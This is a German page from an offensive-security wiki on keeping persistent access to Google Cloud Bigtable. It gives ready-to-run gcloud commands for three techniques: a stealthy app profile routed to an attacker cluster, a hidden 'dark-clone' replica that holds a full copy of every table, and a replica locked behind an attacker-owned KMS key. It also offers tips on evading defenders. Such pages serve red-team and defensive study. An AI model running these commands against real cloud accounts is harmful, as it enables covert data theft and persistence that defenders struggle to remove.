# GCP - Bigtable Persistenz

{{#include ../../../banners/hacktricks-training.md}}

## Bigtable

Weitere Informationen zu Bigtable:

{{#ref}}
../gcp-services/gcp-bigtable-enum.md
{{#endref}}

### Dediziertes Angreifer-App-Profil

**Berechtigungen:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.

Erstelle ein App-Profil, das den Traffic zu deinem Replica-Cluster weiterleitet, und aktiviere Data Boost, damit du nicht von bereitgestellten Knoten abhängig bist, die Verteidiger bemerken könnten.
```bash
gcloud bigtable app-profiles create stealth-profile \
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
--row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile \
--instance=<instance-id> --data-boost \
--data-boost-compute-billing-owner=HOST_PAYS
```
Solange dieses Profil existiert, kannst du dich mit neuen Anmeldeinformationen, die darauf verweisen, wieder verbinden.

### Unterhalte deinen eigenen Replikat-Cluster

**Permissions:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

Stelle einen Cluster mit minimaler Knotenanzahl in einer ruhigen Region bereit. Selbst wenn deine Client-Identitäten verschwinden, **behält der Cluster eine vollständige Kopie jeder Tabelle**, bis die Verteidiger sie explizit entfernen.
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
```
Behalte es über `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` im Auge, damit du bei Bedarf sofort hochskalieren kannst, um Daten zu ziehen.

### Replikation hinter deiner eigenen CMEK absichern

**Berechtigungen:** `bigtable.clusters.create`, `cloudkms.cryptoKeyVersions.useToEncrypt` on the attacker-owned key.

Bringe deinen eigenen KMS-Key mit, wenn du einen Clone hochziehst. Ohne diesen Key kann Google den Cluster nicht neu erstellen oder fail over durchführen, daher müssen blue teams sich mit dir abstimmen, bevor sie ihn anfassen.
```bash
gcloud bigtable clusters create cmek-clone \
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
```
Rotieren oder deaktivieren Sie den Schlüssel in Ihrem Projekt, um das Replikat sofort unbrauchbar zu machen (wobei Sie den Schlüssel später wieder aktivieren können).

{{#include ../../../banners/hacktricks-training.md}}